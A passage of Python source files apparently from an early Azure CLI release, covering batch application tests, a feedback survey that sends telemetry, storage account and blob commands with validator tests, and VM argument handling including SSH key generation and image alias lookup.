JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].id', aname),
])
self.cmd('batch application package create -g {} -n {} --application-id {} --version {} --package-file "{}"'. #pylint: disable=line-too-long
format(rg, name, aname, ver, self.package_file_name), checks=[
JMESPathCheck('id', aname),
JMESPathCheck('storageUrl != null', True),
JMESPathCheck('version', ver),
JMESPathCheck('state', 'pending')
])
self.cmd('batch application package activate -g {} -n {} --application-id {} --version {} --format zip'.format(rg, name, aname, ver)) #pylint: disable=line-too-long
self.cmd('batch application package show -g {} -n {} --application-id {} --version {}'.
format(rg, name, aname, ver), checks=[
JMESPathCheck('id', aname),
JMESPathCheck('format', 'zip'),
JMESPathCheck('version', ver),
JMESPathCheck('state', 'active')
])
self.cmd('batch application set -g {} -n {} --application-id {} --default-version {}'.format(rg, name, aname, ver)) #pylint: disable=line-too-long
self.cmd('batch application show -g {} -n {} --application-id {}'.format(rg, name, aname),
checks=[
JMESPathCheck('id', aname),
JMESPathCheck('defaultVersion', ver),
JMESPathCheck('packages[0].format', 'zip'),
JMESPathCheck('packages[0].state', 'active')
])
# test batch applcation delete
self.cmd('batch application package delete -g {} -n {} --application-id {} --version {}'.
format(rg, name, aname, ver))
self.cmd('batch application delete -g {} -n {} --application-id {}'.format(rg, name, aname))
self.cmd('batch application list -g {} -n {}'.format(rg, name), checks=NoneCheck())
```
#### File: command_modules/feedback/custom.py
```python
from __future__ import print_function
import sys
from six.moves import input #pylint: disable=redefined-builtin
from azure.cli.core import __version__ as core_version
import azure.cli.core._logging as _logging
import azure.cli.command_modules.feedback._help # pylint: disable=unused-import
logger = _logging.get_az_logger(__name__)
MESSAGES = {
'intro': 'We appreciate your feedback! This survey is only two questions and should take less '\
'than a minute.',
'prompt_how_likely': '\nHow likely is it you would recommend our Azure CLI to a friend or '\
'colleague? [0 to 10]: ',
'prompt_what_changes': '\nWhat changes would we have to make for you to give us a higher '\
'rating? ',
'prompt_do_well': '\nWhat do we do really well? ',
'prompt_email_addr': '\nIf you would like to join our insiders program and receive tips, '\
'tricks, and early access to new features, let us know by leaving your '\
'email address (leave blank to skip): ',
'thanks': '\nThanks for your feedback!'
}
INSTRUMENTATION_KEY = '02b91c82-6729-4241-befc-e6d02ca4fbba'
EVENT_NAME = 'FeedbackEvent'
COMPONENT_PREFIX = 'azure-cli-'
def _prompt_net_promoter_score():
while True:
try:
score = int(input(MESSAGES['prompt_how_likely']))
if 0 <= score <= 10:
return score
raise ValueError
except ValueError:
logger.warning('Valid values are %s', list(range(11)))
def _get_version_info():
from pip import get_installed_distributions
installed_dists = get_installed_distributions(local_only=True)
component_version_info = sorted([{'name': dist.key.replace(COMPONENT_PREFIX, ''),
'version': dist.version}
for dist in installed_dists
if dist.key.startswith(COMPONENT_PREFIX)],
key=lambda x: x['name'])
return str(component_version_info), sys.version
def _send_feedback(score, response_what_changes, response_do_well, email_address):
from applicationinsights import TelemetryClient
tc = TelemetryClient(INSTRUMENTATION_KEY)
tc.context.application.ver = core_version
version_components, version_python = _get_version_info()
tc.track_event(
EVENT_NAME,
{'response_what_changes': response_what_changes,
'response_do_well': response_do_well,
'response_email_address': email_address,
'version_components': version_components,
'version_python': version_python},
{'response_net_promoter_score':score})
tc.flush()
def handle_feedback():
try:
print(MESSAGES['intro'])
score = _prompt_net_promoter_score()
response_do_well = None
response_what_changes = None
if score == 10:
response_do_well = input(MESSAGES['prompt_do_well'])
else:
response_what_changes = input(MESSAGES['prompt_what_changes'])
email_address = input(MESSAGES['prompt_email_addr'])
_send_feedback(score, response_what_changes, response_do_well, email_address)
print(MESSAGES['thanks'])
except (EOFError, KeyboardInterrupt):
print()
```
#### File: command_modules/resource/_client_factory.py
```python
def _resource_client_factory(**_):
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.mgmt.resource.resources import ResourceManagementClient
return get_mgmt_service_client(ResourceManagementClient)
def _resource_feature_client_factory(**_):
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.mgmt.resource.features import FeatureClient
return get_mgmt_service_client(FeatureClient)
def _resource_policy_client_factory(**_):
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.mgmt.resource.policy import PolicyClient
return get_mgmt_service_client(PolicyClient)
def cf_resource_groups(_):
return _resource_client_factory().resource_groups
def cf_resources(_):
return _resource_client_factory().resources
def cf_providers(_):
return _resource_client_factory().providers
def cf_tags(_):
return _resource_client_factory().tags
def cf_deployments(_):
return _resource_client_factory().deployments
def cf_deployment_operations(_):
return _resource_client_factory().deployment_operations
def cf_features(_):
return _resource_feature_client_factory().features
def cf_policy_definitions(_):
return _resource_policy_client_factory().policy_definitions
```
#### File: command_modules/storage/custom.py
```python
from __future__ import print_function
from sys import stderr
from azure.mgmt.storage.models import Kind
from azure.storage.models import Logging, Metrics, CorsRule, RetentionPolicy
from azure.storage.blob import BlockBlobService
from azure.storage.blob.baseblobservice import BaseBlobService
from azure.storage.file import FileService
from azure.storage.table import TableService
from azure.storage.queue import QueueService
from azure.cli.core._util import CLIError
from azure.cli.command_modules.storage._factory import \
(storage_client_factory, generic_data_service_factory)
def _update_progress(current, total):
if total:
message = 'Percent complete: %'
percent_done = current * 100 / total
message += '{: >5.1f}'.format(percent_done)
print('\b' * len(message) + message, end='', file=stderr)
stderr.flush()
if current == total:
print('', file=stderr)
# CUSTOM METHODS
def list_storage_accounts(resource_group_name=None):
""" List storage accounts within a subscription or resource group. """
from azure.mgmt.storage.models import StorageAccount
from msrestazure.azure_active_directory import UserPassCredentials
scf = storage_client_factory()
if resource_group_name:
accounts = scf.storage_accounts.list_by_resource_group(resource_group_name)
else:
accounts = scf.storage_accounts.list()
return list(accounts)
def show_storage_account_usage():
""" Show the current count and limit of the storage accounts under the subscription. """
scf = storage_client_factory()
return next((x for x in scf.usage.list() if x.name.value == 'StorageAccounts'), None) #pylint: disable=no-member
# pylint: disable=line-too-long
def show_storage_account_connection_string(
resource_group_name, account_name, protocol='https', blob_endpoint=None,
file_endpoint=None, queue_endpoint=None, table_endpoint=None, key_name='primary'):
""" Generate connection string for a storage account."""
from azure.cli.core._profile import CLOUD
scf = storage_client_factory()
keys = scf.storage_accounts.list_keys(resource_group_name, account_name).keys #pylint: disable=no-member
endpoint_suffix = CLOUD.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
protocol,
endpoint_suffix,
account_name,
keys[0].value if key_name == 'primary' else keys[1].value) #pylint: disable=no-member
connection_string = '{}{}'.format(connection_string, ';BlobEndpoint={}'.format(blob_endpoint) if blob_endpoint else '')
connection_string = '{}{}'.format(connection_string, ';FileEndpoint={}'.format(file_endpoint) if file_endpoint else '')
connection_string = '{}{}'.format(connection_string, ';QueueEndpoint={}'.format(queue_endpoint) if queue_endpoint else '')
connection_string = '{}{}'.format(connection_string, ';TableEndpoint={}'.format(table_endpoint) if table_endpoint else '')
return {'connectionString': connection_string}
def create_storage_account(resource_group_name, account_name, sku, location,
kind=Kind.storage.value, tags=None, custom_domain=None,
encryption=None, access_tier=None):
''' Create a storage account. '''
from azure.mgmt.storage.models import \
(StorageAccountCreateParameters, Sku, CustomDomain, Encryption, AccessTier)
scf = storage_client_factory()
params = StorageAccountCreateParameters(
sku=Sku(sku),
kind=Kind(kind),
location=location,
tags=tags,
custom_domain=CustomDomain(custom_domain) if custom_domain else None,
encryption=encryption,
access_tier=AccessTier(access_tier) if access_tier else None)
return scf.storage_accounts.create(resource_group_name, account_name, params)
def set_storage_account_properties(
resource_group_name, account_name, sku=None, tags=None, custom_domain=None,
encryption=None, access_tier=None):
''' Update storage account property (only one at a time).'''
from azure.mgmt.storage.models import \
(StorageAccountUpdateParameters, Sku, CustomDomain, Encryption, AccessTier)
scf = storage_client_factory()
params = StorageAccountUpdateParameters(
sku=Sku(sku) if sku else None,
tags=tags,
custom_domain=CustomDomain(custom_domain) if custom_domain else None,
encryption=encryption,
access_tier=AccessTier(access_tier) if access_tier else None)
return scf.storage_accounts.update(resource_group_name, account_name, params)
def upload_blob( # pylint: disable=too-many-locals
client, container_name, blob_name, file_path, blob_type=None,
content_settings=None, metadata=None, validate_content=False, maxsize_condition=None,
max_connections=2, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None):
'''Upload a blob to a container.'''
def upload_append_blob():
if not client.exists(container_name, blob_name):
client.create_blob(
container_name=container_name,
blob_name=blob_name,
content_settings=content_settings,
metadata=metadata,
lease_id=lease_id,
if_modified_since=if_modified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout)
return client.append_blob_from_path(
container_name=container_name,
blob_name=blob_name,
file_path=file_path,
progress_callback=_update_progress,
validate_content=validate_content,
maxsize_condition=maxsize_condition,
lease_id=lease_id,
timeout=timeout)
def upload_block_blob():
return client.create_blob_from_path(
container_name=container_name,
blob_name=blob_name,
file_path=file_path,
progress_callback=_update_progress,
content_settings=content_settings,
metadata=metadata,
validate_content=validate_content,
max_connections=max_connections,
lease_id=lease_id,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout
)
type_func = {
'append': upload_append_blob,
'block': upload_block_blob,
'page': upload_block_blob # same implementation
}
return type_func[blob_type]()
upload_blob.__doc__ = BlockBlobService.create_blob_from_path.__doc__
def _get_service_container_type(client):
if isinstance(client, BlockBlobService):
return 'container'
elif isinstance(client, FileService):
return 'share'
elif isinstance(client, TableService):
return 'table'
elif isinstance(client, QueueService):
return 'queue'
else:
raise ValueError('Unsupported service {}'.format(type(client)))
def _get_acl(client, container_name, **kwargs):
container = _get_service_container_type(client)
get_acl = getattr(client, 'get_{}_acl'.format(container))
lease_id = kwargs.get('lease_id', None)
return get_acl(container_name, lease_id=lease_id) if lease_id else get_acl(container_name)
def _set_acl(client, container_name, acl, **kwargs):
container = _get_service_container_type(client)
set_acl = getattr(client, 'set_{}_acl'.format(container))
lease_id = kwargs.get('lease_id', None)
return set_acl(container_name, acl, lease_id=lease_id) if lease_id \
else set_acl(container_name, acl)
def create_acl_policy(
client, container_name, policy_name, start=None, expiry=None, permission=None, **kwargs):
''' Create a stored access policy on the containing object '''
from azure.storage.models import AccessPolicy
acl = _get_acl(client, container_name, **kwargs)
acl[policy_name] = AccessPolicy(permission, expiry, start)
return _set_acl(client, container_name, acl, **kwargs)
def get_acl_policy(client, container_name, policy_name, **kwargs):
''' Show a stored access policy on a containing object '''
from azure.storage.models import AccessPolicy
acl = _get_acl(client, container_name, **kwargs)
return acl.get(policy_name)
def list_acl_policies(client, container_name, **kwargs):
''' List stored access policies on a containing object '''
return _get_acl(client, container_name, **kwargs)
def set_acl_policy(client, container_name, policy_name, start=None, expiry=None, permission=None,
**kwargs):
''' Set a stored access policy on a containing object '''
from azure.storage.models import AccessPolicy
if not (start or expiry or permission):
raise CLIError('Must specify at least one property when updating an access policy.')
acl = _get_acl(client, container_name, **kwargs)
try:
policy = acl[policy_name]
policy.start = start or policy.start
policy.expiry = expiry or policy.expiry
policy.permission = permission or policy.permission
except KeyError:
raise CLIError('ACL does not contain {}'.format(policy_name))
return _set_acl(client, container_name, acl, **kwargs)
def delete_acl_policy(client, container_name, policy_name, **kwargs):
''' Delete a stored access policy on a containing object '''
acl = _get_acl(client, container_name, **kwargs)
del acl[policy_name]
return _set_acl(client, container_name, acl, **kwargs)
def insert_table_entity(client, table_name, entity, if_exists='fail', timeout=None):
if if_exists == 'fail':
client.insert_entity(table_name, entity, timeout)
elif if_exists == 'merge':
client.insert_or_merge_entity(table_name, entity, timeout)
elif if_exists == 'replace':
client.insert_or_replace_entity(table_name, entity, timeout)
else:
raise CLIError("Unrecognized value '{}' for --if-exists".format(if_exists))
class ServiceProperties(object):
def __init__(self, name, service):
self.name = name
self.service = service
self.client = None
def init_client(self, account_name=None, account_key=None, connection_string=None,
sas_token=None):
if not self.client:
self.client = generic_data_service_factory(
self.service, account_name, account_key, connection_string, sas_token)
def get_service_properties(self):
if not self.client:
raise CLIError('Must call init_client before attempting get_service_properties!')
return getattr(self.client, 'get_{}_service_properties'.format(self.name))
def set_service_properties(self):
if not self.client:
raise CLIError('Must call init_client before attempting set_service_properties!')
return getattr(self.client, 'set_{}_service_properties'.format(self.name))
def get_logging(self, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
return self.get_service_properties()(timeout=timeout).__dict__['logging']
def set_logging(self, read, write, delete, retention, account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
retention_policy = RetentionPolicy(
enabled=retention != 0,
days=retention
)
logging = Logging(delete, read, write, retention_policy)
return self.set_service_properties()(logging=logging, timeout=timeout)
def get_cors(self, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
return self.get_service_properties()(timeout=timeout).__dict__['cors']
def add_cors(self, origins, methods, max_age, exposed_headers=None, allowed_headers=None,
account_name=None, account_key=None, connection_string=None, sas_token=None,
timeout=None):
cors = self.get_cors(account_name, account_key, connection_string, sas_token, timeout)
new_rule = CorsRule(origins, methods, max_age, exposed_headers, allowed_headers)
cors.append(new_rule)
return self.set_service_properties()(cors=cors, timeout=timeout)
def clear_cors(self, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
return self.set_service_properties()(cors=[], timeout=timeout)
def get_metrics(self, interval, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
props = self.get_service_properties()(timeout=timeout)
metrics = {}
if interval == 'both':
metrics['hour'] = props.__dict__['hour_metrics']
metrics['minute'] = props.__dict__['minute_metrics']
else:
metrics[interval] = props.__dict__['{}_metrics'.format(interval)]
return metrics
def set_metrics(self, retention, hour, minute, api=None, account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
retention_policy = RetentionPolicy(
enabled=retention != 0,
days=retention
)
hour_metrics = Metrics(hour, api, retention_policy) if hour is not None else None
minute_metrics = Metrics(minute, api, retention_policy) if minute is not None else None
return self.set_service_properties()(
hour_metrics=hour_metrics, minute_metrics=minute_metrics, timeout=timeout)
SERVICES = {
'b': ServiceProperties('blob', BaseBlobService),
'f': ServiceProperties('file', FileService),
'q': ServiceProperties('queue', QueueService),
't': ServiceProperties('table', TableService)
}
def list_cors(services='bfqt', account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
results = {}
for character in services:
properties = SERVICES[character]
results[properties.name] = properties.get_cors(
account_name, account_key, connection_string, sas_token, timeout)
return results
def add_cors(services, origins, methods, max_age=0, exposed_headers=None, allowed_headers=None,
account_name=None, account_key=None, connection_string=None, sas_token=None,
timeout=None):
for character in services:
properties = SERVICES[character]
properties.add_cors(
origins, methods, max_age, exposed_headers, allowed_headers, account_name, account_key,
connection_string, sas_token, timeout)
return None
def clear_cors(services, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
for character in services:
properties = SERVICES[character]
properties.clear_cors(
account_name, account_key, connection_string, sas_token, timeout)
return None
def set_logging(services, log, retention, account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
for character in services:
properties = SERVICES[character]
properties.set_logging(
'r' in log, 'w' in log, 'd' in log, retention, account_name, account_key,
connection_string, sas_token, timeout)
return None
def set_metrics(services, retention, hour=None, minute=None, api=None, account_name=None,
account_key=None, connection_string=None, sas_token=None, timeout=None):
for character in services:
properties = SERVICES[character]
properties.set_metrics(
retention, hour, minute, api, account_name, account_key, connection_string,
sas_token, timeout)
return None
def get_logging(services='bqt', account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
results = {}
for character in services:
properties = SERVICES[character]
results[properties.name] = properties.get_logging(
account_name, account_key, connection_string, sas_token, timeout)
return results
def get_metrics(services='bfqt', interval='both', account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
results = {}
for character in services:
properties = SERVICES[character]
results[properties.name] = properties.get_metrics(
interval, account_name, account_key, connection_string, sas_token, timeout)
return results
```
#### File: storage/tests/integration_test_blob_download.py
```python
import os
import os.path
import shutil
from unittest import TestCase
from .integration_test_base import StorageIntegrationTestBase
from azure.cli.main import main as cli_main
class StorageBlobDownloadPlainTests(TestCase):
def test_blob_download_help(self):
with self.assertRaises(SystemExit):
cli_main('storage blob upload-batch -h'.split())
class StorageBlobDownloadIntegrationTests(StorageIntegrationTestBase):
@classmethod
def setUpClass(cls):
StorageIntegrationTestBase.setUpClass()
# set up sample container
cls._test_source_container = cls.generate_new_container_name()
assert cls._blob_service.create_container(cls._test_source_container)
cli_main('storage blob upload-batch -s {} -d {} --connection-string {}'
.format(cls._resource_folder, cls._test_source_container,
cls._test_connection_string)
.split())
test_blobs = [b.name for b in cls._blob_service.list_blobs(cls._test_source_container)]
assert len(test_blobs) == 41
@classmethod
def tearDownClass(cls):
cls._blob_service.delete_container(cls._test_source_container)
def setUp(self):
self._test_folder = os.path.join(os.getcwd(), 'test_temp')
if os.path.exists(self._test_folder):
shutil.rmtree(self._test_folder)
os.mkdir(self._test_folder)
def test_blob_download_recursively_without_pattern(self):
cmd = 'storage blob download-batch -s {} -d {} --account-name {} --account-key {}'\
.format(self._test_source_container, self._test_folder,
self._blob_service.account_name, self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 41
def test_blob_download_recursively_with_pattern_1(self):
cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\
.format(self._blob_service.primary_endpoint, self._test_source_container,
self._test_folder, '*', self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 41
def test_blob_download_recursively_with_pattern_2(self):
cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\
.format(self._blob_service.primary_endpoint, self._test_source_container,
self._test_folder, 'apple/*', self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 10
def test_blob_download_recursively_with_pattern_3(self):
cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\
.format(self._blob_service.primary_endpoint, self._test_source_container,
self._test_folder, '*/file_0', self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 4
```
#### File: storage/tests/test_validators.py
```python
import unittest
from six import StringIO
from collections import namedtuple
from azure.cli.command_modules.storage._validators import *
class Test_storage_validators(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self.io = StringIO()
def tearDown(self):
self.io.close()
def test_permission_validator(self):
from azure.storage.blob.models import ContainerPermissions
from argparse import Namespace
ns1 = Namespace(permission='rwdl')
ns2 = Namespace(permission='abc')
get_permission_validator(ContainerPermissions)(ns1)
self.assertTrue(isinstance(ns1.permission, ContainerPermissions))
with self.assertRaises(ValueError):
get_permission_validator(ContainerPermissions)(ns2)
def test_datetime_string_type(self):
input = "2017-01-01T12:30Z"
actual = datetime_string_type(input)
expected = "2017-01-01T12:30Z"
self.assertEqual(actual, expected)
input = "2017-01-01 12:30"
with self.assertRaises(ValueError):
actual = datetime_string_type(input)
def test_datetime_type(self):
input = "2017-01-01T12:30Z"
actual = datetime_type(input)
expected = datetime(2017, 1, 1, 12, 30, 0)
self.assertEqual(actual, expected)
input = "2017-01-01 12:30"
with self.assertRaises(ValueError):
actual = datetime_type(input)
def test_ipv4_range_type(self):
input = "172.16.31.10"
actual = ipv4_range_type(input)
expected = input
self.assertEqual(actual, expected)
input = "172.16.31.10-22192.168.3.11"
actual = ipv4_range_type(input)
expected = input
self.assertEqual(actual, expected)
input = "111.22"
with self.assertRaises(ValueError):
actual = ipv4_range_type(input)
input = "111.22.33.44-"
with self.assertRaises(ValueError):
actual = ipv4_range_type(input)
def test_resource_types_type(self):
input = "sso"
actual = str(resource_type_type(input))
expected = "so"
self.assertEqual(actual, expected)
input = "blob"
with self.assertRaises(ValueError):
actual = resource_type_type(input)
def test_services_type(self):
input = "ttfqbqtf"
actual = str(services_type(input))
expected = "bqtf"
self.assertEqual(actual, expected)
input = "everything"
with self.assertRaises(ValueError):
actual = services_type(input)
if __name__ == '__main__':
unittest.main()
```
#### File: command_modules/vm/_actions.py
```python
import argparse
import json
import os
import re
from azure.cli.core._util import CLIError
from azure.cli.core.application import APPLICATION
from azure.cli.core.commands.parameters import get_one_of_subscription_locations
from azure.cli.core.commands.arm import resource_exists
import azure.cli.core._logging as _logging
from six.moves.urllib.request import urlopen #pylint: disable=import-error
from ._client_factory import _compute_client_factory
from ._vm_utils import read_content_if_is_file
logger = _logging.get_az_logger(__name__)
class VMImageFieldAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
image = values
match = re.match('([^:]*):([^:]*):([^:]*):([^:]*)', image)
if image.lower().endswith('.vhd'):
namespace.os_disk_type = 'custom'
namespace.custom_os_disk_uri = image
elif match:
namespace.os_type = 'Custom'
namespace.os_publisher = match.group(1)
namespace.os_offer = match.group(2)
namespace.os_sku = match.group(3)
namespace.os_version = match.group(4)
else:
images = load_images_from_aliases_doc()
matched = next((x for x in images if x['urnAlias'].lower() == image.lower()), None)
if matched is None:
raise CLIError('Invalid image "{}". Please pick one from {}' \
.format(image, [x['urnAlias'] for x in images]))
namespace.os_type = 'Custom'
namespace.os_publisher = matched['publisher']
namespace.os_offer = matched['offer']
namespace.os_sku = matched['sku']
namespace.os_version = matched['version']
class VMSSHFieldAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
namespace.ssh_key_value = read_content_if_is_file(values)
class VMDNSNameAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
dns_value = values
if dns_value:
namespace.dns_name_type = 'new'
namespace.dns_name_for_public_ip = dns_value
class PrivateIpAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
private_ip = values
namespace.private_ip_address = private_ip
if private_ip:
namespace.private_ip_address_allocation = 'static'
def _resource_not_exists(resource_type):
def _handle_resource_not_exists(namespace):
# TODO: hook up namespace._subscription_id once we support it
ns, t = resource_type.split('/')
if resource_exists(namespace.resource_group_name, namespace.name, ns, t):
raise CLIError('Resource {} of type {} in group {} already exists.'.format(
namespace.name,
resource_type,
namespace.resource_group_name))
return _handle_resource_not_exists
def _handle_auth_types(**kwargs):
if kwargs['command'] != 'vm create' and kwargs['command'] != 'vmss create':
return
args = kwargs['args']
is_windows = 'Windows' in args.os_offer \
and getattr(args, 'custom_os_disk_type', None) != 'linux'
if not args.authentication_type:
args.authentication_type = 'password' if is_windows else 'ssh'
if args.authentication_type == 'password':
if args.ssh_dest_key_path:
raise CLIError('SSH parameters cannot be used with password authentication type')
elif not args.admin_password:
import getpass
args.admin_password = <PASSWORD>('Admin Password: ')
elif args.authentication_type == 'ssh':
if args.admin_password:
raise CLIError('Admin password cannot be used with SSH authentication type')
ssh_key_file = os.path.join(os.path.expanduser('~'), '.ssh/id_rsa.pub')
if not args.ssh_key_value:
if os.path.isfile(ssh_key_file):
with open(ssh_key_file) as f:
args.ssh_key_value = f.read()
else:
raise CLIError('An RSA key file or key value must be supplied to SSH Key Value')
if hasattr(args, 'network_security_group_type'):
args.network_security_group_rule = 'RDP' if is_windows else 'SSH'
if hasattr(args, 'nat_backend_port') and not args.nat_backend_port:
args.nat_backend_port = '3389' if is_windows else '22'
APPLICATION.register(APPLICATION.COMMAND_PARSER_PARSED, _handle_auth_types)
def load_images_from_aliases_doc(publisher=None, offer=None, sku=None):
target_url = ('https://raw.githubusercontent.com/Azure/azure-rest-api-specs/'
'master/arm-compute/quickstart-templates/aliases.json')
txt = urlopen(target_url).read()
dic = json.loads(txt.decode())
try:
all_images = []
result = (dic['outputs']['aliases']['value'])
for v in result.values(): #loop around os
for alias, vv in v.items(): #loop around distros
all_images.append({
'urnAlias': alias,
'publisher': vv['publisher'],
'offer': vv['offer'],
'sku': vv['sku'],
'version': vv['version']
})
all_images = [i for i in all_images if (_partial_matched(publisher, i['publisher']) and
_partial_matched(offer, i['offer']) and
_partial_matched(sku, i['sku']))]
return all_images
except KeyError:
raise CLIError('Could not retrieve image list from {}'.format(target_url))
def load_images_thru_services(publisher, offer, sku, location):
from concurrent.futures import ThreadPoolExecutor, as_completed
all_images = []
client = _compute_client_factory()
if location is None:
location = get_one_of_subscription_locations()
def _load_images_from_publisher(publisher):
offers = client.virtual_machine_images.list_offers(location, publisher)
if offer:
offers = [o for o in offers if _partial_matched(offer, o.name)]
for o in offers:
skus = client.virtual_machine_images.list_skus(location, publisher, o.name)
if sku:
skus = [s for s in skus if _partial_matched(sku, s.name)]
for s in skus:
images = client.virtual_machine_images.list(location, publisher, o.name, s.name)
for i in images:
all_images.append({
'publisher': publisher,
'offer': o.name,
'sku': s.name,
'version': i.name})
publishers = client.virtual_machine_images.list_publishers(location)
if publisher:
publishers = [p for p in publishers if _partial_matched(publisher, p.name)]
publisher_num = len(publishers)
if publisher_num > 1:
with ThreadPoolExecutor(max_workers=40) as executor:
tasks = [executor.submit(_load_images_from_publisher, p.name) for p in publishers]
for t in as_completed(tasks):
t.result() # don't use the result but expose exceptions from the threads
elif publisher_num == 1:
_load_images_from_publisher(publishers[0].name)
return all_images
def load_extension_images_thru_services(publisher, name, version, location, show_latest=False):
from concurrent.futures import ThreadPoolExecutor, as_completed
##pylint: disable=no-name-in-module,import-error
from distutils.version import LooseVersion
all_images = []
client = _compute_client_factory()
if location is None:
location = get_one_of_subscription_locations()
def _load_extension_images_from_publisher(publisher):
types = client.virtual_machine_extension_images.list_types(location, publisher)
if name:
types = [t for t in types if _partial_matched(name, t.name)]
for t in types:
versions = client.virtual_machine_extension_images.list_versions(location,
publisher,
t.name)
if version:
versions = [v for v in versions if _partial_matched(version, v.name)]
if show_latest:
#pylint: disable=no-member
versions.sort(key=lambda v: LooseVersion(v.name), reverse=True)
all_images.append({
'publisher': publisher,
'name': t.name,
'version': versions[0].name})
else:
for v in versions:
all_images.append({
'publisher': publisher,
'name': t.name,
'version': v.name})
publishers = client.virtual_machine_images.list_publishers(location)
if publisher:
publishers = [p for p in publishers if _partial_matched(publisher, p.name)]
publisher_num = len(publishers)
if publisher_num > 1:
with ThreadPoolExecutor(max_workers=40) as executor:
tasks = [executor.submit(_load_extension_images_from_publisher,
p.name) for p in publishers]
for t in as_completed(tasks):
t.result() # don't use the result but expose exceptions from the threads
elif publisher_num == 1:
_load_extension_images_from_publisher(publishers[0].name)
return all_images
def get_vm_sizes(location):
return list(_compute_client_factory().virtual_machine_sizes.list(location))
def _partial_matched(pattern, string):
if not pattern:
return True # empty pattern means wildcard-match
pattern = r'.*' + pattern
return re.match(pattern, string, re.I)
def _create_image_instance(publisher, offer, sku, version):
return {
'publisher': publisher,
'offer': offer,
'sku': sku,
'version': version
}
def _handle_container_ssh_file(**kwargs):
if kwargs['command'] != 'acs create':
return
args = kwargs['args']
string_or_file = args.ssh_key_value
content = string_or_file
if os.path.exists(string_or_file):
logger.info('Use existing SSH public key file: %s', string_or_file)
with open(string_or_file, 'r') as f:
content = f.read()
elif not _is_valid_ssh_rsa_public_key(content) and args.generate_ssh_keys:
#figure out appropriate file names:
#'base_name'(with private keys), and 'base_name.pub'(with public keys)
public_key_filepath = string_or_file
if public_key_filepath[-4:].lower() == '.pub':
private_key_filepath = public_key_filepath[:-4]
else:
private_key_filepath = public_key_filepath + '.private'
content = _generate_ssh_keys(private_key_filepath, public_key_filepath)
logger.warning('Created SSH key files: %s,%s', private_key_filepath, public_key_filepath)
args.ssh_key_value = content
def _generate_ssh_keys(private_key_filepath, public_key_filepath):
import paramiko
ssh_dir, _ = os.path.split(private_key_filepath)
if not os.path.exists(ssh_dir):
os.makedirs(ssh_dir)
os.chmod(ssh_dir, 0o700)
key = paramiko.RSAKey.generate(2048)
key.write_private_key_file(private_key_filepath)
os.chmod(private_key_filepath, 0o600)
with open(public_key_filepath, 'w') as public_key_file:
public_key = '%s %s' % (key.get_name(), key.get_base64())
public_key_file.write(public_key)
os.chmod(public_key_filepath, 0o644)
return public_key
def _is_valid_ssh_rsa_public_key(openssh_pubkey):
#http://stackoverflow.com/questions/2494450/ssh-rsa-public-key-validation-using-a-regular-expression #pylint: disable=line-too-long
#A "good enough" check is to see if the key starts with the correct header.
import struct
try:
from base64 import decodebytes as base64_decode
except ImportError:
#deprecated and redirected to decodebytes in Python 3
from base64 import decodestring as base64_decode
parts = openssh_pubkey.split()
if len(parts) < 2:
return False
key_type = parts[0]
key_string = parts[1]
data = base64_decode(key_string.encode())#pylint:disable=deprecated-method
int_len = 4
str_len = struct.unpack('>I', data[:int_len])[0] # this should return 7
return data[int_len:int_len+str_len] == key_type.encode()
APPLICATION.register(APPLICATION.COMMAND_PARSER_PARSED, _handle_container_ssh_file)
```
#### File: lib/models/deployment_avail_set.py
```python
from msrest.serialization import Model
class DeploymentAvailSet(Model):
"""
Deployment operation parameters.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar uri: URI referencing the template. Default value:
"https://azuresdkci.blob.core.windows.net/templatehost/CreateAvailSet_2016-07-18/azuredeploy.json"
.
:vartype uri: str
:param content_version: If included it must match the ContentVersion in
the template.
:type content_version: str
:param location: Location to deploy the availability set.
:type location: str
:param name: Name of the availability set.
:type name: str
:param platform_fault_domain_count: Number of Fault Domains. Default
value: "3" .
:type platform_fault_domain_count: str
:param platform_update_domain_count: Number of Update Domains. Default
value: "5" .
